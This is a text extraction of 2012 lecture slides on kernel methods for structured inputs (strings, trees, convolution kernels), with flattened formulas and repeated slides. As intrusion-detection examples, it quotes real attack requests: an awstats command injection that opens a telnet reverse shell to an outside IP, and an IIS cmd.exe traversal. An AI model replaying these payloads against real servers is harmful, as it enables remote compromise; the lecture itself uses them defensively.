lecture 9 kernel methods for structured inputs...applying the subset product kernel theorem for a =...

Lecture 9Kernel Methods for Structured Inputs

Pavel Laskov1 Blaine Nelson1

1Cognitive Systems Group

Wilhelm Schickard Institute for Computer Science

Universitat Tubingen, Germany

Advanced Topics in Machine Learning, 2012

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 1 / 30

What We Have Learned So Far

r ∗

∗c∗

Learning problems are defined in terms of kernel functions reflecting thegeometry of training data.

What if the data does not naturally belong to inner product spaces?


Example: Intrusion Detection

> GET / HTTP/1.1\x0d\x0aAccept: */*\x0d\x0aAccept-Language: en\x0d

\x0aAccept-Encoding: gzip, deflate\x0d\x0aCookie: POPUPCHECK=1150521721386\x0d\x0aUser-Agent: Mozilla/5.0 (Macintosh; U; Intel

Mac OS X; en) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.3\x0d\x0aConnection: keep-alive\x0d\x0aHost: www.spiegel.de\x0d\x0a\x0d\x0a

> GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;sleep%207200%7ctelnet%20194%2e95%2e173%2e219%204321%7cwhile%20%3a%20%3b%20do%20sh%

20%26%26%20break%3b%20done%202%3e%261%7ctelnet%20194%2e95%2e173%2e219%204321;echo%20YYY;echo| HTTP/1.1\x0d\x0aAccept: */*\x0d\x0a

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\x0d\x0aHost: wuppi.dyndns.org:80\x0d\x0aConnection: Close\x0d\x0a\x0d\x0a

> GET /Images/200606/tscreen2.gif HTTP/1.1\x0d\x0aAccept: */*\x0d\x0aAccept-Language: en\x0d\x0aAccept-Encoding: gzip, deflate\x0d\x0a

Cookie: .ASPXANONYMOUS=AcaruKtUwo5mMjliZjIxZC1kYzI1LTQyYzQtYTMyNy03YWI2MjlkMjhiZGQ1; CommunityServer-UserCookie1001=lv=5/16/2006 12:

27:01 PM&mra=5/17/2006 9:02:37 AM\x0d\x0aUser-Agent: Mozilla/5.0(Macintosh; U; Intel Mac OS X; en) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.3\x0d\x0aConnection: keep-alive\x0d\x0aHost

: www.thedailywtf.com\x0d\x0a\x0d\x0a


Examples of Structured Input Data

Histograms

TreesS

VP

Jeff

V

ate

NP

D

the apple

N

N

NP1.

2.

3.

4. 5.

S

VP

John

V

hit

NP

D

the red

A

car

N

NP

N

1.

2.

3.

4. 5.

Strings

Graphs


Convolution Kernels in a Nutshell

Decompose structured objects into comparable parts.

Aggregate the values of similarity measures for individual parts.


R-Convolution

Let X be a set of composite objects (e.g., cars), and X1, . . . , XD be setsof parts (e.g., wheels, brakes, etc.). All sets are assumed countable.

Let R denote the relation “being part of”:

R(x1, . . . , xD , x) = 1, iff x1, . . . , xD are parts of x

The inverse relation R−1 is defined as:

R−1(x) = {x : R(x, x) = 1}

In other words, for each object x , R−1(x) is a set of component subsets,that are part of x .

We say that R is finite, if R−1 is finite for all x ∈ X .


R-Convolution: A Naive Example


R-Convolution: A Naive Example

wheels

headlights

bumpers

transmission

differential

tow coupling

...

Alfa Romeo Junior Lada Niva


R-Convolution: Further Examples

Let x be a D-tuple in X = X1 × . . . × XD . Let each of the Dcomponents of x ∈ X be a part of x . Then R(x, x) = 1 iff x = x .




Let X1 = X2 = X be sets of all finite strings over a finite alphabet.Define R(x1, x2, x) = 1 iff x = x1 ◦ x2, i.e. concatenation of x1 and x2.




Let X1 = X2 = X be sets of all finite strings over a finite alphabet.Define R(x1, x2, x) = 1 iff x = x1 ◦ x2, i.e. concatenation of x1 and x2.

Let X1 = . . . = XD = X be a set of D-degree ordered and rooted trees.Define R(x, x) = 1 iff x1, . . . , xD are D subtrees of the root of x ∈ X .


R-Convolution Kernel

Definition

Let x , y ∈ X and x and y be the corresponding sets of parts. LetKd (xd , yd ) be a kernel between the d -th parts of x and y (1 ≤ d ≤ D).Then the convolution kernel between x and y is defined as:

K (x , y) =∑

x∈R−1(x)

∑

y∈R−1(y)

D∏

d=1

Kd (xd , yd )


Examples of R-Convolution Kernels

RBF kernel is a convolution kernel. Let each of the D dimensions of xbe a part, and Kd(xd , yd ) = e−(xd−yd)

2/2σ2. Then

K (x , y) =

D∏

d=1

e−(xd−yd )2/2σ2

= e−∑D

d=1(xd−yd)2/2σ2

= e−||x−y||2

2σ2


Examples of R-Convolution Kernels

RBF kernel is a convolution kernel. Let each of the D dimensions of xbe a part, and Kd(xd , yd ) = e−(xd−yd)

2/2σ2. Then

K (x , y) =

D∏

d=1

e−(xd−yd )2/2σ2

= e−∑D

d=1(xd−yd)2/2σ2

= e−||x−y||2

2σ2

Linear kernel K (x , y) =∑D

d=1 xdyd is not a convolution kernel, exceptfor the trivial “single part” decomposition. For any other decomposition,we would need to sum products of more than one term, whichcontradicts the formula for the linear kernel.


Subset Product Kernel

Theorem

Let K be a kernel on a set U × U. The for all finite, non-empty subsetsA,B ⊆ U,

K ′(A,B) =∑

x∈A

∑

y∈B

K (x , y)

is a valid kernel.


Subset Product Kernel

Proof.

Goal: show that K ′(A,B) is an inner product in some space...

Recall that for any point u ∈ U, K (u, ·) is a function Ku in some RKHSH. Let fA =

∑

u∈A Ku, fB =∑

u∈B Ku . Define

〈fA, fB〉 :=∑

x∈A

∑

y∈B

K (x , y)

We need to show that it satisfies properties of an inner product... LetfC =

∑

u∈C Ku . Clearly,

〈fA + fC , fB〉 =∑

x∈A∪C

∑

y∈B

K (x , y) =∑

x∈A

∑

y∈B

K (x , y) +∑

x∈C

∑

y∈B

K (x , y)

Other properties of the inner product can be proved similarly.


Back to the R-Convolution Kernel

Theorem

K (x , y) =∑

x∈R−1(x)

∑

y∈R−1(y)

D∏

d=1

Kd (xd , yd )

is a valid kernel.


Back to the R-Convolution Kernel

Proof.

Let U = X1 × . . .× XD . From the closure of kernels under the tensorproduct, it follows that

K (x, y) =

D∏

d=1

Kd (xd , yd )

is a kernel on U × U. Applying the Subset Product Kernel Theorem forA = R−1(x), B = R−1(y), the theorem’s claim follows.


End of Theory ,


Convolution Kernels for Strings

Let x , y ∈ A∗ be two strings generated from the alphabet A. How can wedefine K (x , y) using the ideas of convolution kernels?




Let D = 1, take X1 to be the set of all possible strings of length n(“n-grams”) generated from the alphabet A. |X1| = |A|n.

For any x ∈ A∗ and any x ∈ X1, define R(x , x) = 1 iff x ⊆ x .

Then R−1(x) is a set of all n-grams contained in x .

Define K (x , y) = 1[x=y ].




Let D = 1, take X1 to be the set of all possible strings of length n(“n-grams”) generated from the alphabet A. |X1| = |A|n.




K (x , y) =∑

x∈R−1(x)

∑

y∈R−1(y)

1[x=y ]


Convolution Kernels for Strings (ctd.)

An alternative definition of a kernel for two strings can be obtained asfollows:

Let D = 1, take X1 to be the set of all possible strings of arbitrarylength generated from the alphabet A. |X1| = ∞.




K (x , y) =∑

x∈R−1(x)

∑

y∈R−1(y)

1[x=y ]

Notice that the size of the summation remains finite despite the infinitedimensionality of X1.


Geometry of String Kernels

Sequences

1. blabla blubla blablabu aa

2. bla blablaa bulab bb abla

3. a blabla blabla ablub bla

4. blab blab abba blabla blu

Geometry

1

2 3

4

Subsequences

Features

Histograms of subsequencesa b aa

bb

bla

blu

ab

ba

ab

la

bla

b

ab

lub

bu

lab

bla

bla

bla

blu

bla

bla

a

bla

bla

bu

1.

2.

3.

4.


Metric Embedding of Strings

Define the language S ⊆ A∗ of possiblefeatures, e.g., n-grams, words, allsubsequences.

For each sequence x , count occurrences ofeach feature in it:

φ : x −→ (φs(x))s∈S

Use φs(x) as the s-th coordinate of x in thevector space of dimensionality |S |.

Define K (x , y) := 〈φs(x), φs (y)〉. This is equivalent to K (x , y) definedby the convolution kernel!


Similarity Measure for Embedded Strings

Metric embedding enables application of various vectorial similaritymeasures over sequences, e.g.

Kernels K (x , y)

Linear∑

s∈S

φs(x)φs(y)

RBF exp(d(x , y)2/σ)

Similarity coefficients

Jaccard, Kulczynski, . . .

Distances d(x , y)

Manhattan∑

s∈S

|φs(x)− φs(y)|

Minkowski k

√

∑

s∈S

|φs(x) − φs(y)|k

Hamming∑

s∈S

sgn |φs(x) − φs(y)|

Chebyshev maxs∈S

|φs(x) − φs(y)|


Embedding example

X = abrakadabraY = barakobama


Embedding example


X Y X · Y

a/5 a/4 20

b/2 b/2 4

d/1

k/1 k/1 1

m/1

o/1

r/2 r/1 2

5.92 4.90 27

∠XY = 21.5◦


Embedding example


X Y X · Y

a/5 a/4 20

b/2 b/2 4

d/1

k/1 k/1 1

m/1

o/1

r/2 r/1 2

5.92 4.90 27

∠XY = 21.5◦

X Y X · Y

ab/2

ad/1

ak/1 ak/1 1

am/1

ar/1

ba/2

br/2

da/1

ka/1

ko/1

ma/1

ob/1

ra/2 ra/1 2

4.00 3.46 3

∠XY = 77.5◦


Implementation of String Kernels

General observations

Embedding space has huge dimensionality but is very sparse; at mostlinear number of entries are different from zero in each sample.

Computation of similarity measures requires operations on either theintersection or the union of the set of non-zero features in each sample.


Implementation of String Kernels

General observations

Embedding space has huge dimensionality but is very sparse; at mostlinear number of entries are different from zero in each sample.

Computation of similarity measures requires operations on either theintersection or the union of the set of non-zero features in each sample.

Implementation strategies

Explicit but sparse representation of feature vectors

⇒ sorted arrays or hash tables

Implicit and general representations

⇒ tries, suffix trees, suffix arrays


String Kernels using Sorted Arrays

Store all features in sorted arrays

Traverse feature arrays of two samples to find mathing elements

φ(x)

φ(z)

aa (3)

ab (3)

ab (2)

ba (2)

bc (2)

bb (1)

cc (1)

bc (4)

Running time:

Sorting: O(n)Comparison: O(n)


String Kernels using Generalized Suffix Trees

2-grams “abbaa” “baaaa”

aa

ab

ba

bb

“abbaa” · “baaaa” = 0

a # $ b

a # $ bbaa# aa baa#

a # $ aa$ #

a$ $

6 6

3 4 2 1

1 3 1 1

0 2




aa 1 3

ab

ba

bb


a # $ b

a # $ bbaa# aa baa#

a # $ aa$ #

a$ $

6 6

3 4 2 1

1 3 1 1

0 2




aa 1 3

ab 1 0

ba

bb


a # $ b

a # $ bbaa# aa baa#

a # $ aa$ #

a$ $

6 6

3 4 2 1

1 3 1 1

0 2




aa 1 3

ab 1 0

ba 1 1

bb


a # $ b

a # $ bbaa# aa baa#

a # $ aa$ #

a$ $

6 6

3 4 2 1

1 3 1 1

0 2




aa 1 3

ab 1 0

ba 1 1

bb 1 0


a # $ b

a # $ bbaa# aa baa#

a # $ aa$ #

a$ $

6 6

3 4 2 1

1 3 1 1

0 2


Tree Kernels: Motivation

Trees are ubiquitous representations in various applications:

Parsing: parse treesContent representation: XML, DOMBioinformatics: philogeny

Ad-hoc features related to trees, e.g. number of nodes or edges, are notinformative for learning

Structural properties of trees, on the other hand, may be verydiscriminative


Example: Normal HTTP Request

GET /test.gif HTTP/1.1<NL> Accept: */*<NL> Accept-Language: en<NL>

Referer: http://host/<NL> Connection: keep-alive<NL>

<httpSession>

<request>

<method>

GET

<uri>

<path>

/test.gif

<version>

HTTP/1.1

<reqhdr>

<hdr>1

<hdrkey>

Accept:

<hdrval>

*/*

<hdr>2

<hdrkey>

Referer:

<hdrval>

http://host

<hdr>3

<hdrkey>

Connection:

<hdrval>

keep-alive


Example: Malicious HTTP Request

GET /scripts/..%%35c../cmd.exe?/c+dir+c:\ HTTP/1.0

<httpSession>

<request>

<method>

GET

<uri>

<path>

/scripts/..%%35c../.../cmd.exe?

<getparamlist>

<getparam>

<getkey>

/c+dir+c:\

<version>

HTTP/1.0


Convolution Kernels for Trees

Similar to strings, we can define kernels for trees using the convolutionkernel framework:

Let D = 1, X1 = X be sets of all trees. |X1| = |X | = ∞.

For any x ∈ X and any x ∈ X1, define R(x , x) = 1 iff x ⊆ x

⇒ x is a subtree of x

Then R−1(x) is a set of all subtrees contained in x .


K (x , y) =∑

x∈R−1(x)

∑

y∈R−1(y)

1[x=y ]


Convolution Kernels for Trees

Similar to strings, we can define kernels for trees using the convolutionkernel framework:

Let D = 1, X1 = X be sets of all trees. |X1| = |X | = ∞.

For any x ∈ X and any x ∈ X1, define R(x , x) = 1 iff x ⊆ x

⇒ x is a subtree of x

Then R−1(x) is a set of all subtrees contained in x .


K (x , y) =∑

x∈R−1(x)

∑

y∈R−1(y)

1[x=y ]

/ Problem: Testing for equality between two trees may be extremelycostly!


Recursive Computation of Tree Kernels

Two useful facts:

Transitivity of a subtree relationship: x ⊆ x & x ⊆ x ⇒ x ⊆ x

Necessary condition for equality: two trees are equal only if all of theirsubtrees are equal.


Recursive Computation of Tree Kernels

Two useful facts:

Transitivity of a subtree relationship: x ⊆ x & x ⊆ x ⇒ x ⊆ x

Necessary condition for equality: two trees are equal only if all of theirsubtrees are equal.

Recursive scheme

Let Ch(x) denote the set of immediate children of the root of (sub)tree x .|x | := |Ch(x)|.

If Ch(x) 6= Ch(y ) return 0.

If |x | = |y |, return 1.

Otherwise return

K (x , y) =

|x|∏

i=1

(1 + K (xi , yi))


Computation of Recursive Clause

Find a pair of nodes with identical subsets of children.




Add one for the nodes themselves (subtrees of cardinality 1).





Add counts for all mathing subtrees.





Add counts for all mathing subtrees.

Multiply together and return the total count.


Summary

Kernels for structured data extend learning methods to a vast variety ofpractical data types.

A generic framework for handling structured data is offered byconvolution kernels.

Special data structures and algorithms are needed for efficiency.

Extensive range of applications:

natural language processingbioinformaticscomputer security


Bibliography I

[1] M. Collins and N. Duffy. Convolution kernel for natural language. InAdvances in Neural Information Proccessing Systems (NIPS), volume 16,pages 625–632, 2002.

[2] D. Haussler. Convolution kernels on discrete structures. Technical ReportUCSC-CRL-99-10, UC Santa Cruz, July 1999.

[3] K. Rieck and P. Laskov. Linear-time computation of similarity measures forsequential data. Journal of Machine Learning Research, 9:23–48, 2008.


lecture 9 kernel methods for structured inputs...applying the subset product kernel theorem for a =...

Documents